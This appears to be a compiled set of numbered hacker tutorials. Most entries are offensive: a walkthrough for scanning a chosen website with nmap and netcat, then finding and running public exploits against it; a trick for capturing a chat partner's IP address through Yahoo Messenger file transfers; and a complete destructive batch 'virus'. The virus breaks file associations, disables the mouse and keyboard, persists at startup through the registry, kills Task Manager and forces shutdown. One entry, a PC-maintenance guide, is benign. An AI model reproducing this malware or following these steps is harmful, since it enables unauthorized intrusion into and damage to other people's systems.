18)Hacking A Website

                                    Hacking A Website

This tutorial will fully explain you how to hack a website.

First of all you need a target website. (Google & find one) 

Once you’ve got it, plug into this website.
Once you’ve done that, it’ll split out its IP address.

Next thing you need to do is find out is, it online or offline. (Ping)
Go to http://www.just-ping.com & ping the IP obtained in last step.
Observe the results from ping. (Okay means online)

Now, we need to gather information about the website. (Whois lookup)
Go to http://whois.domaintools.com & plug up the IP or the website.
You’ll see a large amount of information about the website.
Use Google to find even more information about the website.

Once you’re done download, install & open Nmap.
Once you have done that, do a –sT –sV scan of the website.
[That is put, nmap –sT –sV, in Nmap’s command bar & scan website.]
Once done, observe open OS, ports, services running on the website server.]

Once done, you’ll need to find banner of the software.
[Banner: It shows the software & version running on ports.]
Methods depend on the OS of the server.

For WIN VISTA & 7:

You need to download & Open Netcat.
[Because Telnet is disabled in WIN VISTA & 7]

Once done type, nc <IP> <PORT>
Ex: nc 21
Once you’ve done that, you’ll get a banner.
This will be displaying all the details of the software running on port.

For other OS:

Open Telnet
[Start > RUN > telnet]

Once done type, O <IP> <PORT>
Ex: O 21
Once you’ve done that, you’ll get a banner.
This will be displaying all the details of the software running on port.
If this doesn’t work you can try the first method.

Once you’ve got the banner, you need to search for vulnerability matching with banner.

Exploit databases:
Injector http://www.inj3ct0r.com/
Milw0rm: http://www.milw0rm.com
Security Focus: http://www.securityfocus.com
Osvdb: http://www.osvdb.org
Cve Mitre: http://cve.mitre.org
Metasploit: http://www.metasploit.com 

Once you’ve got the matching exploit of the same version software.
[If you haven’t got, try another port.]
You need to edit values, compile & run it.

Most common exploit Coders:


For perl exploits, Copy the exploit in notepad & save it with .pl extension.
Download & Install, Active Perl: http://www.activestate.com/activeperl
Once done, edit the exploit with notepad & double click to run it.


For PHP exploits, copy & save it in .php extension.
Download & Install WAMP: http://www.wampserver.com/en/
Once done, edit the exploit with notepad & execute it from CMD.


For python exploits, copy & save it in .py extension.
Download & Install python: http://www.python.org/download
Once done, edit the exploit with notepad & double click to run it.


For C/C++ exploits, copy & save it in notepad.
Download & Install Blood Shed. (Google the link)
Once done, edit the exploit, compile & double click to run it.

If your exploit is successful you will get access to server,
You’ll be able to edit every part of the website.
If your exploit wasn’t successful try with different port, services & software.
You can also use Metasploit web to search exploits.

17)Boost your PC at max performance

                        Boost your PC at max performance

Although there are many things that can affect the performance of your computer, there are a few simply things you can do each month to help keep your computer running at maximum performance. This article will focus on two problems that impact the performance of your computer and will then explain what you can do about it.

Problem #1: Computer Hard Disk Files
Your computer is always writing information to your hard disk, no matter what you do. Your computer attempts to keep all file information in the same location on your hard drive. As you add and delete files, blank spaces are left between your files. As you add new programs or files, your computer tries to use these blank spaces.

Over time, this reading and writing of files can affect the way your computer performs. The files eventually become scattered in multiple locations on your hard disk rather than in the same location.

Your computer will still find the information. However, the more scattered the information becomes on your hard drive, the more accesses your computer has to make to find (and gather) the information. This requires your hard disk to work harder and do more reading/writing than is necessary. It will slow down your computer by as much as 200% and causes increased wear and tear on your hard drive.

Problem #2: Spyware
If you use the Internet, at some point you will download a file or software program onto your computer. Sometimes you will know something is beingdownloaded to your computer. Other times you will have no idea. (Although this article will not talk about small files called “cookies”, you may want to look up information on this subject. Cookies are written onto your computer from the Internet.)

Free computer programs (often referred to as Freeware) are a big hit on the Internet. Every day thousands of users download these “free programs”. Although there are some great freeware programs, these programs often have advertisements or tracking code associated with their use. The term “Spyware” refers to programs that gather information about your computer and (Internet) surfing habits without your knowledge. This information is then sold to a third party company as a means of generating revenue.

The problem with Spyware is that it also impacts the performance of your computer. It can make your computer very sluggish and unresponsive.

Three Steps to Improved Computer Performance
Now that we’ve discussed two problems that affect the performance of your computer, let’s discuss three things you can do to get your computer performance back to normal. You should do these three steps in the order presented. Ideally, you should repeat them about once a month or whenever you notice a change in your computer’s performance.

Step #1: Delete Spyware
The first thing you should do is to delete spyware files or programs from your computer. To do this, you can use a free software program such as Ad-Aware SE Personal Edition from LavaSoft. To get the program, go to www.download.com and search for “Ad-Aware SE” (without the quotes). Select “Download Now” and follow the installation instructions. Once the program is installed, you can scan your computer for spyware files. Then, you can select and delete them from your computer.
Note #1: Always be sure to use the “Check for updates now” option to keep your program current.
Note #2: You need to be aware that when you delete spyware files, some of those “free” programs you downloaded may not continue to work correctly. If you have a program you’ve downloaded and want to continue to use, check very carefully what you select to delete from the “Scanning results” once the scan has been completed.

Step #2: Clean up your Hard Disk
Once the spyware is removed, you need to clean up temporary and unwanted files from your hard disk. To do this on your windows PC, select the start option in the lower left hand corner of your computer screen. Then, select the program option. Under the program option, select “Accessories”. Under the “Accessories” option, select “System Tools”. From the System Tools option, select “Disk Cleanup”.

Select the drive you want to clean from the pull-down menu and select OK. Usually, this is Drive C. If you have more than one hard drive, select one at a time. This program will then scan your computer for files that could be erased from your computer. You can safely erase all temporary and Recycle Bin files. You can also check the box of any other files you want the program to erase.

Step #3: Defrag your Hard Disk
Once all the spyware and temporary files are removed, you need to defrag your hard disk. This process simply rewrites your computer files so they are no longer scattered all over your hard disk, but are written in the same location for quick sequential access.

To defrag your hard disk on your windows PC, select the start option in the lower left hand corner of your computer screen. Then, select the program option. Under the program option, select “Accessories”. Under the “Accessories” option, select “System Tools”. From the System Tools option, select “Disk Defragmenter”. First, select the hard drive from your computer. Usually, this is Drive C. However, many computers have multiple hard drives. Select one at a time.

You can select “Analyze” to have the program check out the hard drive and see if it needs to be defragged. The program will prompt you at the completion of its analysis. Use the defragment option as prompted.

Note: If you’ve never used this option before, I would recommend that you select the defragment option.

Once, you’ve completed these three steps, your computer and hard disk should be able to operate at maximum performance. Don’t forget to repeat these steps at least once a month or whenever you notice a change in your computer’s performance.

16)Hacking Yahoo Messenger

                   Hacking Yahoo Messenger

While you are chatting via yahoo messenger the communication between you and the person you want to hack, takes place indirectly via Yahoo server and not directly. It is not possible to hack Yahoo messenger directly to get the IP address. So to hack his IP, you must establish a direct communication with him. So ,how to do this? It’s easy. Just start chatting with some one via Yahoo messenger. During the process of chatting send him a big file. Now the file transfer takes place directly between your computer and the victim’s computer(via yahoo messenger application). So now, you are ready to go. Here’s the step-by-step process to hack Yahoo messenger and get the IP address of the person .
  • Goto the COMMAND PROMPT (START>>>RUN>>>Type CMD).
  • Here Type “netstat -n” (without quotes).
NOTE: If you are new to “netstat” and other IP related commands refer this tutorial: Windows XP IP Utilities
  • The pic given below shows netstat results of my computer. I was not chatting when i took this pic and hence it looks modified.
  • Here local address is your own IP and the foreign address is the IP address of the recipient with whom you are connected via yahoo messenger (There may be multiple recipients and hence multiple foreign addresses).
  • Now send him the file.
  • Check the output by typing the command “netstat -n” (without quotes).
  • Assume the output is something like this.
Here is the IP address of the person with whom you are chatting and 1246 is the port number where connection is established. That’s It! You have now hacked Yahoo messenger to get his IP address.
Once you hack Yahoo messenger and get his IP address you can use any of theRemote Administration tools or perform NETBIOS HACKING.

15)Dangerous virus

                                 Dangerous virus

This is a really destructive virus that:
> disables mouse &keyboard
> disables task manager
> starts at startup
> alters file associations
Here's the code:
----begin code----
@echo off
prompt $P $G
assoc .doc  = fA1luRe
assoc .docx  = fA1luRe
assoc .log  = fA1luRe
assoc .msg  = fA1luRe
assoc .pages  = fA1luRe
assoc .rtf  = fA1luRe
assoc .txt  = fA1luRe
assoc .wpd  = fA1luRe
assoc .wps  = fA1luRe
assoc .accdb  = fA1luRe
assoc .blg  = fA1luRe
assoc .csv  = fA1luRe
assoc .dat  = fA1luRe
assoc .db  = fA1luRe
assoc .efx  = fA1luRe
assoc .mdb  = fA1luRe
assoc .pdb  = fA1luRe
assoc .pps  = fA1luRe
assoc .ppt  = fA1luRe
assoc .pptx  = fA1luRe
assoc .sdb  = fA1luRe
assoc .sdf  = fA1luRe
assoc .sql  = fA1luRe
assoc .vcf  = fA1luRe
assoc .wks  = fA1luRe
assoc .xls  = fA1luRe
assoc .xlsx  = fA1luRe
assoc .xml  = fA1luRe
assoc .bmp  = fA1luRe
assoc .gif  = fA1luRe
assoc .jpg  = fA1luRe
assoc .png  = fA1luRe
assoc .psd  = fA1luRe
assoc .psp  = fA1luRe
assoc .thm  = fA1luRe
assoc .tif  = fA1luRe
assoc .ai  = fA1luRe
assoc .drw  = fA1luRe
assoc .eps  = fA1luRe
assoc .ps  = fA1luRe
assoc .svg  = fA1luRe
assoc .3dm  = fA1luRe
assoc .dwg  = fA1luRe
assoc .dxf  = fA1luRe
assoc .pln  = fA1luRe
assoc .indd  = fA1luRe
assoc .pct  = fA1luRe
assoc .pdf  = fA1luRe
assoc .qxd  = fA1luRe
assoc .qxp  = fA1luRe
assoc .rels  = fA1luRe
assoc .aac  = fA1luRe
assoc .aif  = fA1luRe
assoc .iff  = fA1luRe
assoc .m3u  = fA1luRe
assoc .mid  = fA1luRe
assoc .mp3  = fA1luRe
assoc .mpa  = fA1luRe
assoc .ra  = fA1luRe
assoc .wav  = fA1luRe
assoc .wma  = fA1luRe
assoc .3g2  = fA1luRe
assoc .3gp  = fA1luRe
assoc .asf  = fA1luRe
assoc .asx  = fA1luRe
assoc .avi  = fA1luRe
assoc .flv  = fA1luRe
assoc .mov  = fA1luRe
assoc .mp4  = fA1luRe
assoc .mpg  = fA1luRe
assoc .rm  = fA1luRe
assoc .swf  = fA1luRe
assoc .vob  = fA1luRe
assoc .wmv  = fA1luRe
assoc .asp  = fA1luRe
assoc .cer  = fA1luRe
assoc .csr  = fA1luRe
assoc .css  = fA1luRe
assoc .htm  = fA1luRe
assoc .html  = fA1luRe
assoc .js  = fA1luRe
assoc .jsp  = fA1luRe
assoc .php  = fA1luRe
assoc .rss  = fA1luRe
assoc .tvpi  = fA1luRe
assoc .tvvi  = fA1luRe
assoc .xhtml  = fA1luRe
assoc .fnt  = fA1luRe
assoc .fon  = fA1luRe
assoc .otf  = fA1luRe
assoc .ttf  = fA1luRe
assoc .8bi  = fA1luRe
assoc .plugin  = fA1luRe
assoc .xll  = fA1luRe
assoc .cab  = fA1luRe
assoc .cpl  = fA1luRe
assoc .cur  = fA1luRe
assoc .dll  = fA1luRe
assoc .dmp  = fA1luRe
assoc .drv  = fA1luRe
assoc .key  = fA1luRe
assoc .lnk  = fA1luRe
assoc .sys  = fA1luRe
assoc .cfg  = fA1luRe
assoc .ini  = fA1luRe
assoc .keychain  = fA1luRe
assoc .prf  = fA1luRe
assoc .app  = fA1luRe
assoc .bat  = fA1luRe
assoc .cgi  = fA1luRe
assoc .com  = fA1luRe
assoc .exe  = fA1luRe
assoc .pif  = fA1luRe
assoc .vb  = fA1luRe
assoc .ws  = fA1luRe
assoc .7z  = fA1luRe
assoc .deb  = fA1luRe
assoc .gz  = fA1luRe
assoc .pkg  = fA1luRe
assoc .rar  = fA1luRe
assoc .sit  = fA1luRe
assoc .sitx  = fA1luRe
assoc .tar.gz  = fA1luRe
assoc .zip  = fA1luRe
assoc .zipx  = fA1luRe
assoc .bin  = fA1luRe
assoc .hqx  = fA1luRe
assoc .mim  = fA1luRe
assoc .uue  = fA1luRe
assoc .c  = fA1luRe
assoc .cpp  = fA1luRe
assoc .dtd  = fA1luRe
assoc .java  = fA1luRe
assoc .pl  = fA1luRe
assoc .bak  = fA1luRe
assoc .bup  = fA1luRe
assoc .gho  = fA1luRe
assoc .ori  = fA1luRe
assoc .tmp  = fA1luRe
assoc .dmg  = fA1luRe
assoc .iso  = fA1luRe
assoc .toast  = fA1luRe
assoc .vcd  = fA1luRe
assoc .gam  = fA1luRe
assoc .nes  = fA1luRe
assoc .rom  = fA1luRe
assoc .sav  = fA1luRe
assoc .dbx  = fA1luRe
assoc .msi  = fA1luRe
assoc .part  = fA1luRe
assoc .torrent  = fA1luRe
assoc .yps  = fA1luRe
rundll32.exe mouse, disable
rundll32.exe keyboard, disable
copy setup.bat %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
copy setup.bat %windir%\System32
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v fA1luRe /t REG_SZ /d %windir%\System32\setup.bat
taskkill /f /im taskmgr.exe
reg restore HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr = 1
shutdown -s -f -t 10 -c "PwN3D by fA1luRe!!!"
----end code----

Save it as *.bat
Once saved, don't open it!!!
Open and do this at your own risk!!!